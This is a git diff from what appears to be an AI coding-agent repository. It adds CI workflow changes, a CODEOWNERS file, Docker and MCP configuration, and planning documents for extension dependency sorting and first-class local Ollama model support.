diff --git a/.dockerignore b/.dockerignore new file mode 100644 index 000000000..444ee5c7f --- /dev/null +++ b/.dockerignore @@ -0,0 +1,53 @@ +# ── Build artifacts ── +dist/ +build/ +coverage/ +*.tsbuildinfo + +# ── Dependencies ── +node_modules/ +packages/*/node_modules/ + +# ── Environment & secrets ── +.env +.env.* +!.env.example +.gsd/ + +# ── IDE & OS ── +.idea/ +.vscode/ +*.code-workspace +.DS_Store +Thumbs.db + +# ── Git ── +.git/ +.github/ + +# ── Development files ── +.claude/ +.plans/ +.artifacts/ +.bg-shell/ +.bg_shell +*.log +*.swp +*.swo +*~ +tmp/ +.cache/ + +# ── Native build artifacts ── +native/ +target/ + +# ── Test fixtures ── +tests/ + +# ── Lock files (npm is canonical via package-lock.json) ── +pnpm-lock.yaml +bun.lock + +# ── Tarballs ── +*.tgz diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS new file mode 100644 index 000000000..f54b9a409 --- /dev/null +++ b/.github/CODEOWNERS @@ -0,0 +1,36 @@ +# CODEOWNERS +# Defines required reviewers per path. GitHub enforces these on PRs. +# https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners +# +# Format: <@user or @org/team> +# Last matching rule wins. + +# Default: maintainers review everything not explicitly matched below +* @gsd-build/maintainers + +# Core agent orchestration — RFC required, senior review only +packages/pi-agent-core/ @gsd-build/maintainers +src/resources/extensions/gsd/ @gsd-build/maintainers + +# AI/LLM provider integrations +packages/pi-ai/ @gsd-build/maintainers + +# Terminal UI +packages/pi-tui/ @gsd-build/maintainers + +# Native bindings — platform-specific, needs careful review +native/ @gsd-build/maintainers + +# CI/CD and release pipeline — high blast radius +.github/ @gsd-build/maintainers +scripts/ @gsd-build/maintainers +Dockerfile @gsd-build/maintainers + +# Security-sensitive files — always require maintainer sign-off +.secretscanignore @gsd-build/maintainers +scripts/secret-scan.sh @gsd-build/maintainers +scripts/install-hooks.sh @gsd-build/maintainers + +# Contributor-facing docs — keep accurate, maintainers approve +CONTRIBUTING.md @gsd-build/maintainers +VISION.md @gsd-build/maintainers diff --git a/.github/workflows/ai-triage.yml b/.github/workflows/ai-triage.yml index b07fc8c46..04bc87ae8 100644 --- a/.github/workflows/ai-triage.yml +++ b/.github/workflows/ai-triage.yml @@ -12,9 +12,9 @@ permissions: jobs: triage: - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - - uses: actions/checkout@v4 + - uses: actions/checkout@v6 with: sparse-checkout: | VISION.md @@ -96,41 +96,47 @@ jobs: Be generous in your assessment — only flag clear violations. Ambiguous cases should be marked as aligned. Do NOT flag issues/PRs that are legitimately reporting bugs or requesting features, even if they could be better written.`; - const response = await fetch('https://api.anthropic.com/v1/messages', { - method: 'POST', - headers: { - 'x-api-key': process.env.ANTHROPIC_API_KEY, - 'content-type': 'application/json', - 'anthropic-version': '2023-06-01' - }, - body: JSON.stringify({ - model: 'claude-haiku-4-5-20251001', - max_tokens: 1024, - messages: [{ role: 'user', content: prompt }] - }) - }); - - if (!response.ok) { - const err = await response.text(); - core.setFailed(`Anthropic API error: ${response.status} ${err}`); - return; - } - - const data = await response.json(); - const text = data.content[0].text; - - // Extract JSON from response (handle markdown code blocks) - const jsonMatch = text.match(/\{[\s\S]*\}/); - if (!jsonMatch) { - core.setFailed(`Could not parse Claude response: ${text}`); + if (!process.env.ANTHROPIC_API_KEY) { + core.warning('Skipping AI triage because ANTHROPIC_API_KEY is not configured.'); return; } let result; try { + const response = await fetch('https://api.anthropic.com/v1/messages', { + method: 'POST', + headers: { + 'x-api-key': process.env.ANTHROPIC_API_KEY, + 'content-type': 'application/json', + 'anthropic-version': '2023-06-01' + }, + body: JSON.stringify({ + model: 'claude-haiku-4-5-20251001', + max_tokens: 1024, + messages: [{ role: 'user', content: prompt }] + }), + signal: AbortSignal.timeout(20000) + }); + + if (!response.ok) { + const err = await response.text(); + core.warning(`Skipping AI triage after Anthropic API error: ${response.status} ${err}`); + return; + } + + const data = await response.json(); + const text = data.content?.[0]?.text ?? ''; + + // Extract JSON from response (handle markdown code blocks) + const jsonMatch = text.match(/\{[\s\S]*\}/); + if (!jsonMatch) { + core.warning(`Skipping AI triage because the model response was not parseable JSON: ${text}`); + return; + } + result = JSON.parse(jsonMatch[0]); } catch (e) { - core.setFailed(`JSON parse error: ${e.message}\nRaw text: ${text}`); + core.warning(`Skipping AI triage after unexpected failure: ${e.message}`); return; } core.info(`Triage result: ${JSON.stringify(result, null, 2)}`); diff --git a/.github/workflows/build-native.yml b/.github/workflows/build-native.yml index 3d3bcd9b9..6de0db41f 100644 --- a/.github/workflows/build-native.yml +++ b/.github/workflows/build-native.yml @@ -46,8 +46,9 @@ jobs: - name: Install Rust toolchain uses: dtolnay/rust-toolchain@stable - with: - targets: ${{ matrix.target }} + + - name: Add Rust compilation target + run: rustup target add ${{ matrix.target }} - name: Cache Rust build artifacts uses: Swatinem/rust-cache@v2 @@ -97,7 +98,7 @@ jobs: publish: needs: build if: startsWith(github.ref, 'refs/tags/v') || github.event.inputs.publish == 'true' - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 name: Publish platform packages steps: diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 30bfa4a6f..17351ebb2 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -1,3 +1,4 @@ +# CI workflow — builds, tests, and gates merges to main name: CI on: @@ -24,7 +25,8 @@ concurrency: jobs: detect-changes: - runs-on: ubuntu-latest + timeout-minutes: 2 + runs-on: blacksmith-4vcpu-ubuntu-2404 outputs: docs-only: ${{ steps.check.outputs.docs-only }} steps: @@ -59,7 +61,8 @@ jobs: fi docs-check: - runs-on: ubuntu-latest + timeout-minutes: 5 + runs-on: blacksmith-4vcpu-ubuntu-2404 needs: detect-changes steps: - uses: actions/checkout@v6 @@ -70,8 +73,9 @@ jobs: run: bash scripts/docs-prompt-injection-scan.sh --diff origin/main lint: + timeout-minutes: 5 needs: detect-changes - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/checkout@v6 with: @@ -80,6 +84,9 @@ jobs: - name: Scan for hardcoded secrets run: bash scripts/secret-scan.sh --diff origin/main + - name: Scan for base64-encoded secrets + run: bash scripts/base64-scan.sh --diff origin/main + - name: Ensure .gsd/ is not checked in run: | if [ -d ".gsd" ]; then @@ -95,10 +102,17 @@ jobs: - name: Validate skill references run: node scripts/check-skill-references.mjs + - name: Require tests with source changes + if: github.event_name == 'pull_request' + env: + PR_BASE_SHA: ${{ github.event.pull_request.base.sha }} + run: bash scripts/require-tests.sh + build: + timeout-minutes: 15 needs: detect-changes if: needs.detect-changes.outputs.docs-only != 'true' - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - name: Checkout repository @@ -131,15 +145,21 @@ jobs: - name: Run unit tests run: npm run test:unit + - name: Run package tests + run: npm run test:packages + - name: Run integration tests run: npm run test:integration + - name: Check test coverage thresholds + run: npm run test:coverage + windows-portability: + timeout-minutes: 15 needs: detect-changes if: >- - needs.detect-changes.outputs.docs-only != 'true' && - github.event_name == 'push' && github.ref == 'refs/heads/main' - runs-on: windows-latest + needs.detect-changes.outputs.docs-only != 'true' + runs-on: blacksmith-4vcpu-windows-2025 steps: - name: Checkout repository @@ -162,3 +182,70 @@ jobs: - name: Run unit tests run: npm run test:unit + + - name: Run package tests + run: npm run test:packages + + rtk-portability: + timeout-minutes: 20 + needs: detect-changes + if: needs.detect-changes.outputs.docs-only != 'true' + strategy: + fail-fast: false + matrix: + include: + - label: linux + os: blacksmith-4vcpu-ubuntu-2404 + - label: windows + os: blacksmith-4vcpu-windows-2025 + - label: macos + os: macos-15 + runs-on: ${{ matrix.os }} + + steps: + - name: Checkout repository + uses: actions/checkout@v6 + + - name: Setup Node.js + uses: actions/setup-node@v6 + with: + node-version: '24' + cache: 'npm' + + - name: Install dependencies + env: + PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD: '1' + run: npm ci + + - name: Validate managed RTK install + run: >- + node --experimental-strip-types --input-type=module -e + "const mod = await import('./src/rtk.ts'); + const path = mod.getManagedRtkPath(process.platform); + if (!mod.validateRtkBinary(path)) { + console.error('Managed RTK validation failed:', path); + process.exit(1); + } + console.log('Managed RTK validated at', path);" + + - name: Run RTK-focused portability tests + run: >- + node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs + --experimental-strip-types --experimental-test-isolation=process --test + src/tests/rtk.test.ts + src/tests/rtk-execution-seams.test.ts + src/tests/postinstall.test.ts + src/tests/app-smoke.test.ts + src/resources/extensions/gsd/tests/custom-verification.test.ts + src/resources/extensions/gsd/tests/verification-gate.test.ts + + - name: Generate RTK benchmark evidence + if: matrix.label == 'linux' + run: node scripts/rtk-benchmark.mjs --output .artifacts/rtk-benchmark.md + + - name: Upload RTK benchmark artifact + if: matrix.label == 'linux' + uses: actions/upload-artifact@v4 + with: + name: rtk-benchmark-linux + path: .artifacts/rtk-benchmark.md diff --git a/.github/workflows/cleanup-dev-versions.yml b/.github/workflows/cleanup-dev-versions.yml index ca8896a20..7225a22ea 100644 --- a/.github/workflows/cleanup-dev-versions.yml +++ b/.github/workflows/cleanup-dev-versions.yml @@ -11,7 +11,7 @@ permissions: jobs: cleanup: name: Remove stale -dev versions - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/setup-node@v6 with: diff --git a/.github/workflows/pipeline.yml b/.github/workflows/pipeline.yml index dc5a48b20..75ad95508 100644 --- a/.github/workflows/pipeline.yml +++ b/.github/workflows/pipeline.yml @@ -7,7 +7,7 @@ on: branches: [main] concurrency: - group: pipeline-${{ github.sha }} + group: pipeline-main cancel-in-progress: false permissions: @@ -18,7 +18,7 @@ jobs: dev-publish: name: Dev Publish if: ${{ github.event.workflow_run.conclusion == 'success' }} - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 container: image: ghcr.io/gsd-build/gsd-ci-builder:latest credentials: @@ -71,7 +71,7 @@ jobs: test-verify: name: Test & Verify needs: dev-publish - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/checkout@v6 @@ -81,8 +81,15 @@ jobs: registry-url: https://registry.npmjs.org cache: 'npm' - - name: Install gsd-pi@dev globally - run: npm install -g gsd-pi@dev + - name: Install gsd-pi@dev globally (with registry propagation retry) + run: | + for i in 1 2 3 4 5 6; do + npm install -g gsd-pi@dev && exit 0 + echo "Attempt $i failed — waiting 10s for npm registry propagation..." + sleep 10 + done + echo "Failed to install gsd-pi@dev after 6 attempts" + exit 1 - name: Run smoke tests (against installed binary) run: | @@ -129,7 +136,7 @@ jobs: prod-release: name: Production Release needs: [dev-publish, test-verify] - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 environment: prod steps: - uses: actions/checkout@v6 @@ -180,6 +187,7 @@ jobs: git add package.json package-lock.json CHANGELOG.md native/npm/*/package.json pkg/package.json packages/pi-coding-agent/package.json git commit -m "release: v${RELEASE_VERSION}" git tag "v${RELEASE_VERSION}" + git pull --rebase origin main git push origin main git push origin "v${RELEASE_VERSION}" @@ -240,7 +248,7 @@ jobs: update-builder: name: Update CI Builder Image if: ${{ github.event.workflow_run.conclusion == 'success' }} - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: - uses: actions/checkout@v6 with: diff --git a/.github/workflows/pr-risk.yml b/.github/workflows/pr-risk.yml index bde087b7a..2b96c9bb9 100644 --- a/.github/workflows/pr-risk.yml +++ b/.github/workflows/pr-risk.yml @@ -14,19 +14,19 @@ permissions: jobs: risk-check: name: Classify changed files and assess risk - runs-on: ubuntu-latest + runs-on: blacksmith-4vcpu-ubuntu-2404 steps: # Checkout the BASE branch — our trusted script and map, not fork code. - name: Checkout base - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: ref: ${{ github.base_ref }} - name: Setup Node.js - uses: actions/setup-node@v4 + uses: actions/setup-node@v6 with: - node-version: '20' + node-version: '24' # Use the GitHub API to get changed files — no fork code is executed. - name: Get changed files @@ -44,14 +44,14 @@ jobs: id: risk run: | REPORT=$(cat /tmp/changed-files.txt | node scripts/pr-risk-check.mjs --github || true) - echo "report<> $GITHUB_OUTPUT - echo "$REPORT" >> $GITHUB_OUTPUT - echo "EOF" >> $GITHUB_OUTPUT + echo "report<> "$GITHUB_OUTPUT" + echo "$REPORT" >> "$GITHUB_OUTPUT" + echo "EOF" >> "$GITHUB_OUTPUT" RISK_LEVEL=$(cat /tmp/changed-files.txt | node scripts/pr-risk-check.mjs --json 2>/dev/null \ | node -e "let d=''; process.stdin.on('data',c=>d+=c); process.stdin.on('end',()=>{ try { console.log(JSON.parse(d).risk) } catch { console.log('low') } })" \ || echo "low") - echo "level=$RISK_LEVEL" >> $GITHUB_OUTPUT + echo "level=$RISK_LEVEL" >> "$GITHUB_OUTPUT" - name: Write step summary run: echo "${{ steps.risk.outputs.report }}" >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/regenerate-models.yml b/.github/workflows/regenerate-models.yml new file mode 100644 index 000000000..f68251158 --- /dev/null +++ b/.github/workflows/regenerate-models.yml @@ -0,0 +1,43 @@ +# Regenerates models.generated.ts from live provider APIs weekly. +# Opens a PR automatically if the model list has changed. +name: Regenerate model registry + +on: + schedule: + - cron: '0 6 * * 1' # Every Monday at 06:00 UTC + workflow_dispatch: # Allow manual trigger + +permissions: + contents: write + pull-requests: write + +jobs: + regenerate: + runs-on: blacksmith-4vcpu-ubuntu-2404 + timeout-minutes: 15 + steps: + - uses: actions/checkout@v6 + + - uses: actions/setup-node@v4 + with: + node-version: '22' + cache: 'npm' + + - name: Install dependencies + run: npm ci + + - name: Regenerate model registry + run: npx tsx packages/pi-ai/scripts/generate-models.ts + + - name: Open PR if changed + uses: peter-evans/create-pull-request@v7 + with: + commit-message: 'chore(pi-ai): regenerate model registry from upstream APIs' + title: 'chore(pi-ai): regenerate model registry from upstream APIs' + body: | + Automated weekly regeneration of `models.generated.ts` from live provider APIs. + + Run `packages/pi-ai/scripts/generate-models.ts` — no logic changed, output only. + branch: chore/auto-regenerate-models + labels: chore + delete-branch: true diff --git a/.gitignore b/.gitignore index 465c44380..5862cc861 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,17 @@ +# ── Compiled test output ── +dist-test/ + +# ── Compiled output in src/ (should only contain .ts source) ── +src/**/*.js +src/**/*.js.map +src/**/*.d.ts +src/**/*.d.ts.map +!src/**/*.test.js + +# ── Repowise index (local machine-generated cache) ── +.repowise/ + # ── GSD project state (development-only, lives in worktree branches) ── package-lock.json .claude/ @@ -39,6 +52,9 @@ tmp/ packages/*/dist/ packages/*/node_modules/ +# ── Scratch/WIP files ── +preflight-script.ts + # ── GSD baseline (auto-generated) ── dist/ !/pkg/dist/modes/ @@ -52,6 +68,7 @@ TODOS.md .planning/ .audits/ docs/coherence-audit/ +.plans/ # ── GSD project state (per-worktree, never committed) ── .gsd/ @@ -62,3 +79,6 @@ bun.lock # ── GSD baseline (auto-generated) ── .gsd + +# ── GSD baseline (auto-generated) ── +.gsd-id diff --git a/.mcp.json b/.mcp.json new file mode 100644 index 000000000..a8e68079d --- /dev/null +++ b/.mcp.json @@ -0,0 +1,14 @@ +{ + "mcpServers": { + "repowise": { + "command": "repowise", + "args": [ + "mcp", + "/Users/jeremymcspadden/Github/gsd-2", + "--transport", + "stdio" + ], + "description": "repowise: codebase intelligence \u2014 docs, graph, git signals, dead code, decisions" + } + } +} diff --git a/.npmrc b/.npmrc new file mode 100644 index 000000000..b6f27f135 --- /dev/null +++ b/.npmrc @@ -0,0 +1 @@ +engine-strict=true diff --git a/PLAN.md b/.plans/doctor-cleanup-consolidation.md similarity index 100% rename from PLAN.md rename to .plans/doctor-cleanup-consolidation.md diff --git a/.plans/extension-loading-multi-path.md b/.plans/extension-loading-multi-path.md new file mode 100644 index 000000000..1cc76f735 --- /dev/null +++ b/.plans/extension-loading-multi-path.md @@ -0,0 +1,138 @@ +# Extension Loading: Dependency Sort + Unified Enable/Disable + +## Context + +GSD-2 has a well-structured extension system with three discovery paths (bundled, global/community, project-local) that are **already wired up** through pi's `DefaultPackageManager.addAutoDiscoveredResources()`. However, two critical gaps remain: + +1. `sortExtensionPaths()` (topological dependency sort) is implemented but **never called** — `dependencies.extensions` in manifests is decorative +2. The GSD extension registry (enable/disable) only applies to **bundled** extensions — community extensions bypass it entirely + +### Architecture (Current Flow) + +``` +GSD loader.ts + → discoverExtensionEntryPaths(bundledExtDir) + → filter by GSD registry (isExtensionEnabled) + → set GSD_BUNDLED_EXTENSION_PATHS env var + ↓ +DefaultResourceLoader.reload() + → packageManager.resolve() + → addAutoDiscoveredResources() + → project: cwd/.gsd/extensions/ (CONFIG_DIR_NAME = ".gsd") + → global: ~/.gsd/agent/extensions/ (includes synced bundled) + → loadExtensions(mergedPaths) ← NO sort, NO registry check on community +``` + +### Key Files + +| File | Role | +|------|------| +| `src/loader.ts` (lines 146-161) | GSD startup — bundled discovery + registry filter | +| `src/extension-sort.ts` | Topological sort (Kahn's BFS) — EXISTS but NEVER CALLED | +| `src/extension-registry.ts` | Registry I/O, enable/disable, tier checks | +| `src/resource-loader.ts` (lines 589-607) | `buildResourceLoader()` — constructs DefaultResourceLoader | +| `packages/pi-coding-agent/src/core/resource-loader.ts` (lines 311-395) | `reload()` — merges paths, calls `loadExtensions()` | +| `packages/pi-coding-agent/src/core/package-manager.ts` (lines 1585-1700) | `addAutoDiscoveredResources()` — auto-discovers from .gsd/ dirs | +| `packages/pi-coding-agent/src/core/extensions/loader.ts` (lines 945-1002) | `discoverAndLoadExtensions()` — DEAD CODE, never invoked | + +--- + +## Plan + +### Task 1: Wire topological sort into extension loading + +**What:** Call `sortExtensionPaths()` on the merged extension paths before passing them to `loadExtensions()`. + +**Where:** `packages/pi-coding-agent/src/core/resource-loader.ts` ~line 381-385 + +**Before:** +```typescript +const extensionsResult = await loadExtensions(extensionPaths, this.cwd, this.eventBus); +``` + +**After:** +```typescript +import { sortExtensionPaths } from '../../../src/extension-sort.js'; + +const { sortedPaths, warnings } = sortExtensionPaths(extensionPaths); +for (const w of warnings) { + // emit as diagnostic, not hard error +} +const extensionsResult = await loadExtensions(sortedPaths, this.cwd, this.eventBus); +``` + +**Consideration:** `sortExtensionPaths` lives in `src/` (GSD side), not in `packages/pi-coding-agent/`. Need to either: +- (a) Move it into pi-coding-agent as a shared utility, OR +- (b) Import it cross-package (already done for other GSD→pi imports), OR +- (c) Call it on the GSD side before paths reach pi — harder since auto-discovered paths are added inside pi's package manager + +Option (a) is cleanest — the sort logic only depends on `readManifestFromEntryPath` which is also in `src/extension-registry.ts` but could be duplicated or shared. + +### Task 2: Apply GSD registry to community extensions + +**What:** When `buildResourceLoader()` in `src/resource-loader.ts` constructs the DefaultResourceLoader, also discover and filter community extensions from `~/.gsd/agent/extensions/` through the GSD registry — same as it already does for `~/.pi/agent/extensions/` paths. + +**Where:** `src/resource-loader.ts` → `buildResourceLoader()` (lines 589-607) + +**Current code already filters pi extensions:** +```typescript +const piExtensionPaths = discoverExtensionEntryPaths(piExtensionsDir) + .filter((entryPath) => !bundledKeys.has(getExtensionKey(entryPath, piExtensionsDir))) + .filter((entryPath) => { + const manifest = readManifestFromEntryPath(entryPath) + if (!manifest) return true + return isExtensionEnabled(registry, manifest.id) + }) +``` + +**Add similar filtering for community extensions in agentDir:** +- Discover extensions in `~/.gsd/agent/extensions/` that are NOT bundled +- Filter through `isExtensionEnabled(registry, manifest.id)` +- Pass as disabled (via override patterns or pre-filtering) to the resource loader + +**Alternative approach:** Hook into `addAutoDiscoveredResources` or the `addResource` call to check the GSD registry. This might be cleaner since the auto-discovery already happens inside pi's package manager. + +### Task 3: Emit sort warnings as diagnostics + +**What:** Surface dependency warnings (missing deps, cycles) through GSD's diagnostic system so users see them. + +**Where:** Wherever the sort is invoked from Task 1. + +**Format:** +``` +⚠ Extension 'gsd-watch' declares dependency 'gsd' which is not installed — loading anyway +⚠ Extensions 'foo' and 'bar' form a dependency cycle — loading in alphabetical order +``` + +### Task 4: Clean up dead code + +**What:** The `discoverAndLoadExtensions()` function in `packages/pi-coding-agent/src/core/extensions/loader.ts` (lines 945-1002) is exported but never invoked. The project-local trust model inside it (`getUntrustedExtensionPaths`) also never runs. + +**Options:** +- (a) Remove it entirely — it's dead +- (b) Mark deprecated — in case upstream pi uses it +- (c) Leave it — lowest risk + +Recommend (b) for now — add `@deprecated` JSDoc so it doesn't grow new callers. + +### Task 5: Tests + +- **Sort integration test:** Create two extensions where A depends on B. Verify B loads before A after sort. +- **Registry community test:** Drop a community extension in `~/.gsd/agent/extensions/`, run `gsd extensions disable `, verify it doesn't load. +- **Conflict test:** Same extension ID in project-local and global — verify project-local wins. +- **Missing dep test:** Extension declares dependency on non-existent extension — verify warning emitted, extension still loads. +- **Cycle test:** Two extensions that depend on each other — verify warning, both load. + +--- + +## Follow-up PR (separate) + +**Subagent extension forwarding:** Update `src/resources/extensions/subagent/index.ts` to forward ALL extension paths (not just bundled) to child processes. May need a second env var like `GSD_COMMUNITY_EXTENSION_PATHS` or consolidate into `GSD_EXTENSION_PATHS`. + +--- + +## Open Questions + +1. **Where should `sortExtensionPaths` live?** Currently in `src/` (GSD side). Needs to be callable from pi's resource-loader. Options: move to pi, keep and import cross-package, or duplicate. +2. **Should community extensions respect the same registry as bundled?** Or should they have their own enable/disable mechanism? Current plan unifies them. +3. **Project-local trust:** The TOFU model in the dead `discoverAndLoadExtensions()` never runs. Should `addAutoDiscoveredResources` also gate project-local extensions behind trust? Or is `.gsd/extensions/` in your own project always trusted? diff --git a/.plans/issue-575-dynamic-model-routing.md b/.plans/issue-575-dynamic-model-routing.md index c68eab6bf..b32190405 100644 --- a/.plans/issue-575-dynamic-model-routing.md +++ b/.plans/issue-575-dynamic-model-routing.md @@ -11,7 +11,7 @@ Users on capped plans (e.g., Claude Pro) exhaust weekly token limits in 15-20 ho ## Current Architecture ### What Exists -- **Phase-based model config:** Users can set different models per phase via `preferences.md` (research, planning, execution, completion) +- **Phase-based model config:** Users can set different models per phase via `PREFERENCES.md` (research, planning, execution, completion) - **Fallback chains:** Each phase supports `fallbacks: [model1, model2]` for error recovery - **Pre-dispatch hooks:** `PreDispatchResult` has a `model` field but it's **never applied** in `auto.ts` — this is a ready-made extension point - **Model registry:** `ModelRegistry.getAvailable()` provides all configured models with metadata diff --git a/web/left-native-tui-main-session-plan.md b/.plans/left-native-tui-main-session-plan.md similarity index 100% rename from web/left-native-tui-main-session-plan.md rename to .plans/left-native-tui-main-session-plan.md diff --git a/.plans/ollama-native-provider.md b/.plans/ollama-native-provider.md new file mode 100644 index 000000000..312743c95 --- /dev/null +++ b/.plans/ollama-native-provider.md @@ -0,0 +1,241 @@ +# Ollama Extension — First-Class Local LLM Support + +## Status: DRAFT — Awaiting approval + +## Problem + +Ollama support in GSD2 currently requires manual `models.json` configuration. Users must: +1. Know the OpenAI-compatibility endpoint (`localhost:11434/v1`) +2. Manually list every model they want to use +3. Set compat flags (`supportsDeveloperRole: false`, etc.) +4. Use a dummy API key + +There's an `ollama-cloud` provider for hosted Ollama, and a discovery adapter that can list models, but no first-class **local Ollama** extension that "just works." + +## Goal + +Make Ollama the easiest way to use GSD2 — zero config when Ollama is running locally. All Ollama functionality lives in a single extension: `src/resources/extensions/ollama/`. + +## Architecture + +Everything is a self-contained extension under `src/resources/extensions/ollama/`. The extension: +- Auto-detects Ollama on startup via health check +- Discovers and registers local models with the model registry +- Provides native Ollama API streaming (not OpenAI shim) +- Exposes `/ollama` slash commands for model management +- Registers an LLM-callable tool for model pull/status + +Minimal core changes — only `KnownProvider` and `KnownApi` type additions in `pi-ai`, and `env-api-keys.ts` for key resolution. Everything else is in the extension. + +## File Structure + +``` +src/resources/extensions/ollama/ +├── index.ts # Extension entry — wires everything on session_start +├── ollama-client.ts # HTTP client for Ollama REST API (/api/*) +├── ollama-discovery.ts # Model discovery + capability detection +├── ollama-provider.ts # Native /api/chat streaming provider (registers with pi-ai) +├── ollama-commands.ts # /ollama slash commands (status, pull, list, remove, ps) +├── ollama-tool.ts # LLM-callable tool for model management +├── model-capabilities.ts # Known model capability table (context window, vision, reasoning) +└── types.ts # Shared types for Ollama API responses +``` + +## Scope + +### Phase 1: Auto-Discovery + OpenAI-Compat Routing + +**What:** Extension that auto-detects Ollama, discovers models, registers them using the existing `openai-completions` API provider. Zero config needed. + +**Extension files:** +- `ollama/index.ts` — Main entry. On `session_start`: + 1. Probe `localhost:11434` (or `OLLAMA_HOST`) with 1.5s timeout + 2. If reachable, discover models via `/api/tags` + 3. Register discovered models with `ctx.modelRegistry` using correct defaults + 4. Show status widget if Ollama is detected +- `ollama/ollama-client.ts` — Low-level HTTP client: + - `isRunning()` — `GET /` health check + - `getVersion()` — `GET /api/version` + - `listModels()` — `GET /api/tags` + - `showModel(name)` — `POST /api/show` (details, template, parameters, size) + - `getRunningModels()` — `GET /api/ps` (loaded models, VRAM usage) + - `pullModel(name, onProgress)` — `POST /api/pull` (streaming progress) + - `deleteModel(name)` — `DELETE /api/delete` + - `copyModel(source, dest)` — `POST /api/copy` + - Respects `OLLAMA_HOST` env var for non-default endpoints +- `ollama/ollama-discovery.ts` — Enhanced model discovery: + - Calls `/api/tags` to get model list + - Calls `/api/show` per model (batch, cached) to get: + - `details.parameter_size` → estimate context window + - `details.families` → detect vision (clip), reasoning (deepseek-r1) + - `modelfile` → extract default parameters + - Returns enriched `DiscoveredModel[]` with proper capabilities +- `ollama/model-capabilities.ts` — Known model lookup table: + - Maps well-known model families to capabilities + - e.g., `llama3.1` → `{ contextWindow: 131072, input: ["text"] }` + - e.g., `llava` → `{ contextWindow: 4096, input: ["text", "image"] }` + - e.g., `deepseek-r1` → `{ reasoning: true, contextWindow: 131072 }` + - e.g., `qwen2.5-coder` → `{ contextWindow: 131072, input: ["text"] }` + - Fallback: estimate from parameter count if not in table +- `ollama/types.ts` — Ollama API response types + +**Core changes (minimal):** +- `packages/pi-ai/src/types.ts` — Add `"ollama"` to `KnownProvider` +- `packages/pi-ai/src/env-api-keys.ts` — Add `"ollama"` key resolution (returns `"ollama"` placeholder — no real key needed) +- `src/onboarding.ts` — Add `"ollama"` to provider selection list +- `src/wizard.ts` — Add `ollama` entry (no key required) + +**Model registration details:** +Each discovered model registers as: +```typescript +{ + id: "llama3.1:8b", // from /api/tags + name: "Llama 3.1 8B", // humanized + api: "openai-completions", // uses existing provider + provider: "ollama", + baseUrl: "http://localhost:11434/v1", + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + reasoning: false, // from capabilities table + input: ["text"], // from capabilities table + contextWindow: 131072, // from capabilities table or /api/show + maxTokens: 16384, // conservative default + compat: { + supportsDeveloperRole: false, + supportsReasoningEffort: false, + supportsUsageInStreaming: false, + maxTokensField: "max_tokens", + }, +} +``` + +**Behavior:** +- `gsd --list-models` shows all locally-pulled Ollama models automatically +- `/model ollama/llama3.1:8b` works without any config file +- If Ollama isn't running, extension is silent — no errors, no models listed +- `models.json` overrides still work (user config wins over auto-discovery) + +### Phase 2: Native Ollama API Provider (`/api/chat`) + +**What:** A dedicated streaming provider that talks Ollama's native protocol instead of the OpenAI compatibility shim. + +**Extension files:** +- `ollama/ollama-provider.ts` — Native `/api/chat` streaming: + - Registers `"ollama-chat"` API with `registerApiProvider()` + - Implements `stream()` and `streamSimple()`: + - Maps GSD `Context` → Ollama messages format + - Maps GSD `Tool[]` → Ollama tool format + - Streams NDJSON responses, maps back to `AssistantMessage` events + - Extracts `` blocks for reasoning models (deepseek-r1, qwq) + - Ollama-specific options: + - `keep_alive` — control model memory retention (default: "5m") + - `num_ctx` — pass through model's context window + - `num_predict` — max output tokens + - Temperature, top_p, top_k + - Response metadata: + - `eval_count` / `eval_duration` → tokens/sec in usage stats + - `total_duration`, `load_duration` → performance visibility + - Vision support: converts image content to base64 for multimodal models + +**Core changes:** +- `packages/pi-ai/src/types.ts` — Add `"ollama-chat"` to `KnownApi` + +**Phase 1 models switch to `api: "ollama-chat"` by default.** Users can force OpenAI-compat via `models.json` override if needed. + +**Why native over OpenAI-compat:** +- Full `keep_alive` / `num_ctx` control +- Better error messages (Ollama-native vs generic OpenAI) +- More reliable tool calling on Ollama's native format +- Performance metrics in response (tokens/sec) +- Foundation for model management commands + +### Phase 3: Local LLM Management UX + +**What:** `/ollama` slash commands and an LLM tool for model management. + +**Extension files:** +- `ollama/ollama-commands.ts` — Slash commands registered via `pi.registerCommand()`: + - `/ollama` — Status overview: + ``` + Ollama v0.5.7 — running (localhost:11434) + + Loaded: + llama3.1:8b 4.7 GB VRAM idle 3m + + Available: + llama3.1:8b (4.7 GB) + qwen2.5-coder:7b (4.4 GB) + deepseek-r1:8b (4.9 GB) + ``` + - `/ollama pull ` — Pull with streaming progress via `ctx.ui.setWidget()` + - `/ollama list` — List all local models with sizes and families + - `/ollama remove ` — Delete a model (with confirmation) + - `/ollama ps` — Running models + VRAM usage +- `ollama/ollama-tool.ts` — LLM-callable tool registered via `pi.registerTool()`: + - `ollama_manage` tool — lets the agent pull/list/check models + - Parameters: `{ action: "list" | "pull" | "status" | "ps", model?: string }` + - Use case: agent detects it needs a model, pulls it automatically + +**UX Flow:** +``` +$ gsd +> /ollama +Ollama v0.5.7 — running (localhost:11434) +Loaded: + llama3.1:8b — 4.7 GB VRAM, idle 3m +Available: + llama3.1:8b (4.7 GB) + qwen2.5-coder:7b (4.4 GB) + deepseek-r1:8b (4.9 GB) + +> /ollama pull codestral:22b +Pulling codestral:22b... 